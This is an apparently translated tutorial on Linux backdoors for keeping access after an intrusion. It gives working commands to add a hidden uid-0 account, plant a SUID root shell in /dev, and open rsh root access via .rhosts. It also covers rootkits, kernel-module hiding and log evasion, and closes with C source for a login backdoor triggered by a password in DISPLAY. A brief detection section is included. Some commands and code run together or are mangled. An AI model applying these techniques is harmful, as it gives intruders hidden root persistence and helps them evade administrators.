Backdoor Introduction
A technology used to facilitate next entry after intruders fully control the system.
You can modify the system configuration file and install a third-party backdoor tool. It is concealed and can bypass system logs and is not easily discovered by system administrators.
Common backdoor technology
Add a Super User Account
Crack/sniff User Password
Place SUID Shell
Rhosts ++
Using system service programs
TCP/UDP/ICMP Shell
Crontab scheduled task
Shared library files
Toolkit rootkit
Loadable kernel module (LKM)
Add Super Users
# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow |
If the system does not allow users with uid = 0 to log on remotely, you need to add a common user account.
Crack/sniff User Password
After obtaining the shadow file, use the John the Ripper tool to crack the weak user password. Install sniffit and other sniffing tools, listen to telnet, ftp and other ports, and collect user passwords.
Place SUID Shell
# cp /bin/bash /dev/.rootshell# chmod u+s /dev/.rootshell |
A common user can run/dev/. rootshell on the local machine to obtain a shell with the root permission.
rhosts + +# echo "+ +" > /.rhosts# rsh -l root victim.com csh -i |
You can obtain a rootshell remotely.
Using system service programs
Modify/etc/inetd. conf and daytime stream tcp nowait/bin/sh-I; replace inted service programs such as in. telnetd and in. rexmcm with trojan program
Redirect login program
TCP/UDP/ICMP Shell
BindShell is mostly a network service program based on TCP/UDP protocol. It is easy to detect high-port listening. Ping Backdoor and activate a Backdoor through an ICMP packet to form a Shell channel.
Backdoors of tcp ack packets can be crossed through the firewall.
Crontab scheduled task
You can use the Crontab program to schedule installed backdoor programs to run on a regular basis. Generally, this is the time when the system administrator is offline during the late night periods.
Shared library files
Embed a backdoor function in the shared library and use the backdoor password to activate the Shell. The system administrator can bypass the system administrator's verification of the binary file.
Toolkit rootkit
Includes a series of system and backdoor tools:
◆ Clear logon records in logs
◆ Camouflage checksum
◆ Replacing netstat, ps, and other network tools
◆ Backdoor logon programs are easy to install and use
Loadable kernel module (LKM)
LKM: Loadable Kernel Modules dynamic loading without re-compiling the Kernel.
Intercepts system calls and provides powerful functions such as hiding directories, files, processes, and network connections.
It is easy to discover and conceal itself.
The famous LKM packages include adore and knark.
Backdoor Detection
With your own experience, combined with specific tools, you can work with your hands to detect.
Use Tripwire or md5 verification to check the system.
The IDS system monitors suspicious network connections on the target machine.
Instance: login Backdoor
The intruder first backs up the original/bin/login and replaces/bin/login with a program. When an intruder logs in via telnet, it uses environment variables or terminal types.
If a correct backdoor password is passed, a Shell is directly obtained. If a common user logs on, the Shell is redirected to the original login file to process normal logon.
The simplest login backdoor ulogin. c source code is as follows:
Instance: login Backdoor
#include#define PASSWORD "passWORD"#define _PATH_LOGIN "/sbin/logins"main (argc, argv, envp)int argc;char **argv, **envp;{char *display = getenv("DISPLAY");if ( display == NULL ) {execve(_PATH_LOGIN, argv, envp);perror(_PATH_LOGIN);exit(1);}if (!strcmp(display,PASSWORD)) {system("/bin/csh");exit(1);}execve(_PATH_LOGIN, argv, envp);exit(1);} |
